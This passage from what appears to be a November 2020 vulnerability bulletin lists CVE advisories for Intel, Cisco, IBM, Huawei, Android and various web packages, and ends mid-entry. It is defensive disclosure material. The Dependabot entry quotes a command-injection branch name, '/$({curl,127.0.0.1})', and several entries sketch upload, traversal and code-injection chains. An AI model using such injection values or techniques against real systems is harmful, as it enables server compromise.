CapaSystems CapaInstaller before 6.0.101 does not properly assign, modify, or check privileges for an actor who attempts to edit registry values, allowing an attacker to escalate privileges. 2020-11-09 not yet calculated CVE-2020-27977
CONFIRM
cellinx — nvt_web_server
 
Cellinx NVT Web Server 5.0.0.014b.test 2019-09-05 allows a remote user to run commands as root via SetFileContent.cgi because authentication is on the client side. 2020-11-06 not yet calculated CVE-2020-28250
MISC
cisco — asr_9000_series_aggregation_services_routers
 
A vulnerability in the ingress packet processing function of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper resource allocation when an affected device processes network traffic in software switching mode (punted). An attacker could exploit this vulnerability by sending specific streams of Layer 2 or Layer 3 protocol data units (PDUs) to an affected device. A successful exploit could cause the affected device to run out of buffer resources, which could make the device unable to process or forward traffic, resulting in a DoS condition. The device would need to be restarted to regain functionality. 2020-11-12 not yet calculated CVE-2020-26070
CISCO

cisco — webex_network_recording_player_and_webex_player

Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. 2020-11-06 not yet calculated CVE-2020-3573
CISCO
MISC

cisco — webex_network_recording_player_and_webex_player

Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. 2020-11-06 not yet calculated CVE-2020-3604
CISCO
MISC

cisco — webex_network_recording_player_and_webex_player

Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. 2020-11-06 not yet calculated CVE-2020-3603
CISCO
MISC
ckeditor — ckeditor
 
A cross-site scripting (XSS) vulnerability in the Color Dialog plugin for CKEditor 4.15.0 allows remote attackers to run arbitrary web script after persuading a user to copy and paste crafted HTML code into one of editor inputs. 2020-11-12 not yet calculated CVE-2020-27193
CONFIRM
CONFIRM
MISC
cmsuno — cmsuno
 
An authenticated attacker can inject malicious code into “lang” parameter in /uno/central.php file in CMSuno 1.6.2 and run this PHP code in the web page. In this way, attacker can takeover the control of the server. 2020-11-13 not yet calculated CVE-2020-25538
MISC
cmsuno — cmsuno
 
In CMSuno 1.6.2, an attacker can inject malicious PHP code as a “username” while changing his/her username & password. After that, when attacker logs in to the application, attacker’s code will be run. As a result of this vulnerability, authenticated user can run command on the server. 2020-11-13 not yet calculated CVE-2020-25557
MISC
compass_plus — tranzware_payment_gateway
 
A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28415). 2020-11-12 not yet calculated CVE-2020-28414
MISC
MISC
compass_plus — tranzware_payment_gateway
 
A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28414). 2020-11-12 not yet calculated CVE-2020-28415
MISC
MISC
couchbase — couchbase_server
 
Exposed Erlang Cookie could lead to Remote Command Execution (RCE) attack. Communication between Erlang nodes is done by exchanging a shared secret (aka “magic cookie”). There are cases where the magic cookie is included in the content of the logs. An attacker can use the cookie to attach to an Erlang node and run OS level commands on the system running the Erlang node. Affects version: 6.5.1. Fix version: 6.6.0. 2020-11-12 not yet calculated CVE-2020-24719
CONFIRM
debian — raptor_xml_writer.c
 
raptor_xml_writer_start_element_common in raptor_xml_writer.c in Raptor RDF Syntax Library 2.0.15 miscalculates the maximum nspace declarations for the XML writer, leading to heap-based buffer overflows (sometimes seen in raptor_qname_format_as_xml). 2020-11-06 not yet calculated CVE-2017-18926
MLIST
MLIST
MLIST
MISC
MLIST
DEBIAN
MISC
deephas — deephas
 
Prototype pollution vulnerability in ‘deephas’ versions 1.0.0 through 1.0.5 allows attacker to cause a denial of service and may lead to remote code execution. 2020-11-12 not yet calculated CVE-2020-28271
MISC
MISC
dell — inspiron
 
Dell Inspiron 15 7579 2-in-1 BIOS versions prior to 1.31.0 contain an Improper SMM communication buffer verification vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2020-11-10 not yet calculated CVE-2020-5388
MISC
dependabot — dependabot
 
Dependabot is a set of packages for automated dependency management for Ruby, JavaScript, Python, PHP, Elixir, Rust, Java, .NET, Elm and Go. In Dependabot-Core from version 0.119.0.beta1 before version 0.125.1, there is a remote code execution vulnerability in dependabot-common and dependabot-go_modules when a source branch name contains malicious injectable bash code. For example, if Dependabot is configured to use the following source branch name: “/$({curl,127.0.0.1})”, Dependabot will make a HTTP request to the following URL: 127.0.0.1 when cloning the source repository. The fix was applied to version 0.125.1. As a workaround, one can escape the branch name prior to passing it to the Dependabot::Source class. 2020-11-13 not yet calculated CVE-2020-26222
MISC
MISC
CONFIRM
dundas_data_visualization — dundas_bi_server The server in Dundas BI through 8.0.0.1001 allows XSS via addition of a Component (e.g., a button) when events such as click, hover, etc. occur. 2020-11-10 not yet calculated CVE-2020-28409
MISC
dundas_data_visualization — dundas_bi_server The server in Dundas BI through 8.0.0.1001 allows XSS via an HTML label when creating or editing a dashboard. 2020-11-10 not yet calculated CVE-2020-28408
MISC
dyne — tomb
 
ask_password in Tomb 2.0 through 2.7 returns a warning when pinentry-curses is used and $DISPLAY is non-empty, causing affected users’ files to be encrypted with “tomb {W] Detected DISPLAY, but only pinentry-curses is found.” as the encryption key. 2020-11-13 not yet calculated CVE-2020-28638
MISC
eclipse — hono
 
In Eclipse Hono version 1.3.0 and 1.4.0 the AMQP protocol adapter does not verify the size of AMQP messages received from devices. In particular, a device may send messages that are bigger than the max-message-size that the protocol adapter has indicated during link establishment. While the AMQP 1.0 protocol explicitly disallows a peer to send such messages, a hand crafted AMQP 1.0 client could exploit this behavior in order to send a message of unlimited size to the adapter, eventually causing the adapter to fail with an out of memory exception. 2020-11-13 not yet calculated CVE-2020-27217
CONFIRM
express-validators — express-validators
 
All versions of package express-validators are vulnerable to Regular Expression Denial of Service (ReDoS) when validating specifically-crafted invalid urls. 2020-11-11 not yet calculated CVE-2020-7767
MISC
fastadmin — fastadmin-tp6
 
In fastadmin-tp6 v1.0, in the file app/admin/controller/Ajax.php the ‘table’ parameter passed is not filtered so a malicious parameter can be passed for SQL injection. 2020-11-13 not yet calculated CVE-2020-21667
MISC
field — field
 
Prototype pollution vulnerability in ‘field’ versions 0.0.1 through 1.0.1 allows attacker to cause a denial of service and may lead to remote code execution. 2020-11-12 not yet calculated CVE-2020-28269
MISC
MISC
find-my-way — find-my-way
 
This affects the package find-my-way before 2.2.5, from 3.0.0 and before 3.0.5. It accepts the Accept-Version’ header by default, and if versioned routes are not being used, this could lead to a denial of service. Accept-Version can be used as an unkeyed header in a cache poisoning attack. 2020-11-08 not yet calculated CVE-2020-7764
MISC
MISC
flexdotnetcms — flexdotnetcms An unrestricted file upload issue in FlexDotnetCMS before v1.5.9 allows an authenticated remote attacker to upload and execute arbitrary files by using the FileManager to upload malicious code (e.g., ASP code) in the form of a safe file type (e.g., a TXT file), and then using the FileEditor (in v1.5.8 and prior) or the FileManager’s rename function (in v1.5.7 and prior) to rename the file to an executable extension (e.g., ASP), and finally executing the file via an HTTP GET request to /<path_to_file>. 2020-11-12 not yet calculated CVE-2020-27386
MISC
MISC
MISC
flexdotnetcms — flexdotnetcms
 
Incorrect Access Control in the FileEditor (/Admin/Views/FileEditor/) in FlexDotnetCMS before v1.5.11 allows an authenticated remote attacker to read and write to existing files outside the web root. The files can be accessed via directory traversal, i.e., by entering a .. (dot dot) path such as ……….<file> in the input field of the FileEditor. In FlexDotnetCMS before v1.5.8, it is also possible to access files by specifying the full path (e.g., C:<file>). The files can then be edited via the FileEditor. 2020-11-12 not yet calculated CVE-2020-27385
MISC
MISC
gdm3 — gdm3
 
gdm3 versions before 3.36.2 or 3.38.2 would start gnome-initial-setup if gdm3 can’t contact the accountservice service via dbus in a timely manner; on Ubuntu (and potentially derivatives) this could be be chained with an additional issue that could allow a local user to create a new privileged account. 2020-11-10 not yet calculated CVE-2020-16125
MISC
MISC
MISC
google — android

 

In getPermissionInfosForGroup of Utils.java, there is a logic error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-153879813 2020-11-10 not yet calculated CVE-2020-0418
MISC
google — android

 

In send_vc of res_send.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-161362564 2020-11-10 not yet calculated CVE-2020-0424
MISC
google — android
 
Radar COVID is the official COVID-19 exposure notification app for Spain. In affected versions of Radar COVID, identification and de-anonymization of COVID-19 positive users that upload Radar COVID TEKs to the Radar COVID server is possible. This vulnerability enables the identification and de-anonymization of COVID-19 positive users when using Radar COVID. The vulnerability is caused by the fact that Radar COVID connections to the server (uploading of TEKs to the backend) are only made by COVID-19 positives. Therefore, any on-path observer with the ability to monitor traffic between the app and the server can identify which users had a positive test. Such an adversary can be the mobile network operator (MNO) if the connection is done through a mobile network, the Internet Service Provider (ISP) if the connection is done through the Internet (e.g., a home network), a VPN provider used by the user, the local network operator in the case of enterprise networks, or any eavesdropper with access to the same network (WiFi or Ethernet) as the user as could be the case of public WiFi hotspots deployed at shopping centers, airports, hotels, and coffee shops. The attacker may also de-anonymize the user. For this additional stage to succeed, the adversary needs to correlate Radar COVID traffic to other identifiable information from the victim. This could be achieved by associating the connection to a contract with the name of the victim or by associating Radar COVID traffic to other user-generated flows containing identifiers in the clear (e.g., HTTP cookies or other mobile flows sending unique identifiers like the IMEI or the AAID without encryption). The former can be executed, for instance, by the Internet Service Provider or the MNO. The latter can be executed by any on-path adversary, such as the network provider or even the cloud provider that hosts more than one service accessed by the victim. The farther the adversary is either from the victim (the client) or the end-point (the server), the less likely it may be that the adversary has access to re-identification information. The vulnerability has been mitigated with the injection of dummy traffic from the application to the backend. Dummy traffic is generated by all users independently of whether they are COVID-19 positive or not. The issue was fixed in iOS in version 1.0.8 (uniform distribution), 1.1.0 (exponential distribution), Android in version 1.0.7 (uniform distribution), 1.1.0 (exponential distribution), Backend in version 1.1.2-RELEASE. For more information see the referenced GitHub Security Advisory. 2020-11-13 not yet calculated CVE-2020-26230
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
CONFIRM
MISC
google — android
 
In create of FileMap.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.0 Android-8.1 Android-9Android ID: A-156997193 2020-11-10 not yet calculated CVE-2020-0409
MISC
grpc — grpc The package grpc before 1.24.4; the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition. 2020-11-11 not yet calculated CVE-2020-7768
MISC
MISC
MISC
MISC
MISC
hazelcast — imdg_enterprise
 
The LDAP authentication method in LdapLoginModule in Hazelcast IMDG Enterprise 4.x before 4.0.3, and Jet Enterprise 4.x through 4.2, doesn’t verify properly the password in some system-user-dn scenarios. As a result, users (clients/members) can be authenticated even if they provide invalid passwords. 2020-11-09 not yet calculated CVE-2020-26168
MISC
CONFIRM
CONFIRM
MISC
huawei — fusioncompute
 
FusionCompute versions 8.0.0 have an insecure encryption algorithm vulnerability. Attackers with high permissions can exploit this vulnerability to cause information leak. 2020-11-12 not yet calculated CVE-2020-9128
MISC
huawei — mate_30_firmware
 
HUAWEI Mate 30 versions earlier than 10.1.0.159(C00E159R7P2) have a vulnerability of improper buffer operation. Due to improper restrictions, local attackers with high privileges can exploit the vulnerability to cause system heap overflow. 2020-11-13 not yet calculated CVE-2020-9129
MISC
huawei — multiple_products
 
Some Huawei products have a command injection vulnerability. Due to insufficient input validation, an attacker with high privilege may inject some malicious codes in some files of the affected products. Successful exploit may cause command injection.Affected product versions include:NIP6300 versions V500R001C30,V500R001C60;NIP6600 versions V500R001C30,V500R001C60;Secospace USG6300 versions V500R001C30,V500R001C60;Secospace USG6500 versions V500R001C30,V500R001C60;Secospace USG6600 versions V500R001C30,V500R001C60;USG9500 versions V500R001C30,V500R001C60. 2020-11-13 not yet calculated CVE-2020-9127
MISC
huawei — multiple_products
 
There is a denial of service vulnerability in some Huawei products. There is no protection against the attack scenario of specific protocol. A remote, unauthorized attackers can construct attack scenarios, which leads to denial of service.Affected product versions include:NIP6300 versions V500R001C30,V500R001C60;NIP6600 versions V500R001C30,V500R001C60;Secospace USG6300 versions V500R001C30,V500R001C60;Secospace USG6500 versions V500R001C30,V500R001C60;Secospace USG6600 versions V500R001C30,V500R001C60;USG9500 versions V500R001C30,V500R001C60. 2020-11-13 not yet calculated CVE-2020-1847
MISC
ibm — cognos_controller
 
A low level user of IBM Cognos Controller 10.3.0, 10.3.1, 10.4.0, 10.4.1, and 10.4.2 who has Administration rights to the server where the application is installed, can escalate their privilege from Low level to Super Admin and gain access to Create/Update/Delete any level of user in Cognos Controller. IBM X-Force ID: 186625. 2020-11-11 not yet calculated CVE-2020-4685
XF
CONFIRM
ibm — content_navigator
 
IBM Content Navigator 3.0CD is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 187189. 2020-11-10 not yet calculated CVE-2020-4704
XF
CONFIRM
ibm — content_navigator
 
IBM Content Navigator 3.0CD is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188737. 2020-11-10 not yet calculated CVE-2020-4760
XF
CONFIRM
ibm — infosphere_information_server
 
IBM InfoSphere Information Server 11.7 stores sensitive information in the browser’s history that could be obtained by a user who has access to the same system. IBM X-Force ID: 190910. 2020-11-13 not yet calculated CVE-2020-4886
XF
CONFIRM
ibm — tivoli_key_lifecycle_manager
 
IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, and 4.0 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 184157. 2020-11-10 not yet calculated CVE-2020-4568
XF
CONFIRM
ilex  — international_sign&go_workstation_security_suite
 
Ilex International Sign&go Workstation Security Suite 7.1 allows elevation of privileges via a symlink attack on ProgramDataIlexS&GLogs00-sngWSService1.log. 2020-11-10 not yet calculated CVE-2020-23968
MISC
MISC
MISC
ilias — ilias
 
An XSS issue exists in the question-pool file-upload preview feature in ILIAS 6.4. 2020-11-10 not yet calculated CVE-2020-25267
MISC
ilias — ilias
 
Remote Code Execution can occur via the external news feed in ILIAS 6.4 because of incorrect parameter sanitization for Magpie RSS data. 2020-11-10 not yet calculated CVE-2020-25268
MISC
intel — adas_ie
 
Improper input validation in the Intel(R) ADAS IE before version ADAS_IE_1.0.766 may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12323
MISC
intel — advisor_tools
 
Improper permissions in the installer for the Intel(R) Advisor tools before version 2020 Update 2 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12334
MISC

intel — amt

Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8757
CONFIRM
MISC
intel — amt
 
Out-of-bounds read in subsystem in Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-12356
CONFIRM
MISC
intel — amt
 
Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable denial of service via adjacent access. 2020-11-12 not yet calculated CVE-2020-8746
CONFIRM
MISC
intel — amt
 
Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. 2020-11-12 not yet calculated CVE-2020-8749
CONFIRM
MISC
intel — amt
 
Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure and/or denial of service via network access. 2020-11-12 not yet calculated CVE-2020-8747
CONFIRM
MISC
intel — amt
 
Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8760
CONFIRM
MISC
intel — amt_and_ism
 
Out-of-bounds write in IPv6 subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow an unauthenticated user to potentially enable escalation of privileges via network access. 2020-11-12 not yet calculated CVE-2020-8752
CONFIRM
MISC
intel — amt_and_ism
 
Out-of-bounds read in DHCP subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access. 2020-11-12 not yet calculated CVE-2020-8753
CONFIRM
MISC
intel — amt_sdk
 
Incorrect default permissions in Windows(R) installer in Intel(R) AMT SDK versions before 14.0.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12354
CONFIRM
MISC
intel — batter_life_diagnostic_tool Improper permissions in the installer for the Intel(R) Battery Life Diagnostic Tool before version 1.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12346
MISC
intel — board_id_tool
 
Incorrect default permissions in the Intel(R) Board ID Tool version v.1.01 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-24456
MISC
intel — client_ssds_and_data_center_ssds
 
Insufficient control flow managementin firmware in some Intel(R) Client SSDs and some Intel(R) Data Center SSDs may allow an unauthenticated user to potentially enable information disclosure via physical access. 2020-11-12 not yet calculated CVE-2020-12310
MISC
intel — client_ssds_and_data_center_ssds
 
Insufficiently protected credentialsin subsystem in some Intel(R) Client SSDs and some Intel(R) Data Center SSDs may allow an unauthenticated user to potentially enable information disclosure via physical access. 2020-11-12 not yet calculated CVE-2020-12309
MISC
intel — client_ssds_and_data_center_ssds
 
Insufficient control flow managementin firmware in some Intel(R) Client SSDs and some Intel(R) Data Center SSDs may allow an unauthenticated user to potentially enable information disclosure via physical access. 2020-11-12 not yet calculated CVE-2020-12311
MISC
intel — computing_improvement_program
 
Improper access control for the Intel(R) Computing Improvement Program before version 2.4.5982 may allow an unprivileged user to potentially enable information disclosure via network access. 2020-11-12 not yet calculated CVE-2020-12308
MISC
intel — cs12_host_controller
 
Out of bounds read in the Intel CSI2 Host Controller driver may allow an authenticated user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-0573
MISC
intel — csme
 
Insecure default initialization of resource in Intel(R) Boot Guard in Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE versions before 3.1.80 and 4.0.30, Intel(R) SPS versions before E5_04.01.04.400, E3_04.01.04.200, SoC-X_04.00.04.200 and SoC-A_04.00.04.300 may allow an unauthenticated user to potentially enable escalation of privileges via physical access. 2020-11-12 not yet calculated CVE-2020-8705
CONFIRM
CONFIRM
CONFIRM
MISC
intel — csme
 
Inadequate encryption strength in subsystem for Intel(R) CSME versions before 13.0.40 and 13.30.10 may allow an unauthenticated user to potentially enable information disclosure via physical access. 2020-11-12 not yet calculated CVE-2020-8761
CONFIRM
MISC
intel — csme
 
Improper input validation in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8756
CONFIRM
MISC
intel — csme_and_sps
 
Race condition in subsystem for Intel(R) CSME versions before 12.0.70 and 14.0.45, Intel(R) SPS versions before E5_04.01.04.400 and E3_05.01.04.200 may allow an unauthenticated user to potentially enable escalation of privilege via physical access. 2020-11-12 not yet calculated CVE-2020-8755
CONFIRM
CONFIRM
MISC
intel — csme_and_txe Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, Intel(R) TXE versions before 3.1.80 may allow an unauthenticated user to potentially enable information disclosure via physical access. 2020-11-12 not yet calculated CVE-2020-8751
CONFIRM
CONFIRM
MISC
intel — csme_and_txe Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25 , Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access. 2020-11-12 not yet calculated CVE-2020-8745
CONFIRM
CONFIRM
MISC
intel — csme_and_txe
 
Improper initialization in subsystem for Intel(R) CSME versions before12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE versions before 4.0.30 Intel(R) SPS versions before E3_05.01.04.200 may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8744
CONFIRM
CONFIRM
CONFIRM
MISC
intel — csme_driver
 
Improper access control in Installer for Intel(R) CSME Driver for Windows versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access. 2020-11-12 not yet calculated CVE-2020-12297
CONFIRM
CONFIRM
MISC
intel — csme_driver_and_txe
 
Use after free in DAL subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access. 2020-11-12 not yet calculated CVE-2020-12303
CONFIRM
CONFIRM
MISC
intel — dal_sdk
 
Improper access control in Installer for Intel(R) DAL SDK before version 2.1 for Windows may allow an authenticated user to potentially enable escalation of privileges via local access. 2020-11-12 not yet calculated CVE-2020-12304
MISC
intel — data_center_manager_console
 
Improper input validation in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable information disclosure via network access. 2020-11-12 not yet calculated CVE-2020-12349
MISC
intel — data_center_manager_console
 
Improper permissions in the installer for the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12345
MISC
intel — data_center_manager_console
 
Improper input validation in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable escalation of privilege via network access. 2020-11-12 not yet calculated CVE-2020-12347
MISC
intel — data_center_manager_console
 
Improper permissions in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable denial of service via network access. 2020-11-12 not yet calculated CVE-2020-12353
MISC
intel — data_center_manager_console
 
Improper input validation in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable information disclosure via network access. 2020-11-12 not yet calculated CVE-2020-8669
MISC
intel — dsa
 
Incorrect default permissions in the Intel(R) DSA before version 20.8.30.6 may allow an authenticated user to potentially enable denial of service via local access. 2020-11-12 not yet calculated CVE-2020-24460
MISC
intel — ema Insufficiently protected credentials in the Intel(R) EMA before version 1.3.3 may allow an authorized user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-12316
MISC
intel — ema
 
Path traversal in the Intel(R) EMA before version 1.3.3 may allow an unauthenticated user to potentially enable escalation of privilege via network access. 2020-11-12 not yet calculated CVE-2020-12315
MISC
intel — ethernet_700_series_controllers
 
A logic issue in the firmware of the Intel(R) Ethernet 700 Series Controllers may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access. 2020-11-12 not yet calculated CVE-2020-8691
MISC
intel — ethernet_700_series_controllers
 
Protection mechanism failure in Intel(R) Ethernet 700 Series Controllers before version 7.3 may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access. 2020-11-12 not yet calculated CVE-2020-8690
MISC
intel — ethernet_700_series_controllers
 
Insufficient access control in the firmware of the Intel(R) Ethernet 700 Series Controllers before version 7.3 may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access. 2020-11-12 not yet calculated CVE-2020-8692
MISC
intel — ethernet_700_series_controllers
 
Improper buffer restrictions in the firmware of the Intel(R) Ethernet 700 Series Controllers may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access. 2020-11-12 not yet calculated CVE-2020-8693
MISC
intel — falcon_8+_uas_asctec_thermal_viewer
 
Improper permissions in the installer for the Intel(R) Falcon 8+ UAS AscTec Thermal Viewer, all versions, may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12330
MISC
intel — hid_event_filter_driver
 
Improper permissions in the installer for the Intel(R) HID Event Filter Driver, all versions, may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12332
MISC
intel — high_definition_audio_drivers
 
Improper permissions in some Intel(R) High Definition Audio drivers before version 9.21.00.4561 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12307
MISC
intel — media_sdk
 
Improper file permissions in the installer for the Intel(R) Media SDK for Windows before version 2019 R1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2019-11121
MISC
intel — multiple_processors
 
Improper access control in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8764
MISC
intel — multiple_products Out-of-bounds read in subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access. 2020-11-12 not yet calculated CVE-2020-8754
CONFIRM
MISC
intel — multiple_products
 
Buffer overflow in firmware for Intel(R) SSD DC P4800X and P4801X Series, Intel(R) Optane(TM) SSD 900P and 905P Series may allow an unauthenticated user to potentially enable a denial of service via local access. 2020-11-12 not yet calculated CVE-2020-0584
MISC
intel — nuc
 
Improper buffer restrictions in firmware for some Intel(R) NUCs may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12337
MISC
intel — nuc
 
Insecure default variable initialization in firmware for some Intel(R) NUCs may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12336
MISC
intel — nuc
 
Insecure inherited permissions in firmware update tool for some Intel(R) NUCs may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-24525
FULLDISC
MISC
intel — open_webrtc
 
Insufficient control flow management in the Open WebRTC Toolkit before version 4.3.1 may allow an unauthenticated user to potentially enable escalation of privilege via network access. 2020-11-13 not yet calculated CVE-2020-12338
MISC
intel — processor_identification_utility
 
Improper permissions in the installer for the Intel(R) Processor Identification Utility before version 6.4.0603 may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-12335
MISC
intel — processors
 
Improper input validation in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-0590
CONFIRM
MISC
intel — processors
 
Out of bounds write in Intel BIOS platform sample code for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-8740
MISC
intel — processors
 
Out of bounds write in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or denial of service via local access. 2020-11-12 not yet calculated CVE-2020-0592
CONFIRM
MISC
intel — processors
 
Improper buffer restrictions in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-0591
CONFIRM
MISC
intel — processors
 
Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-0588
CONFIRM
MISC
intel — processors
 
Observable discrepancy in the RAPL interface for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access. 2020-11-12 not yet calculated CVE-2020-8695
MISC
intel — processors
 
Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. 2020-11-12 not yet calculated CVE-2020-0587
CONFIRM
MISC
intel — processors
 
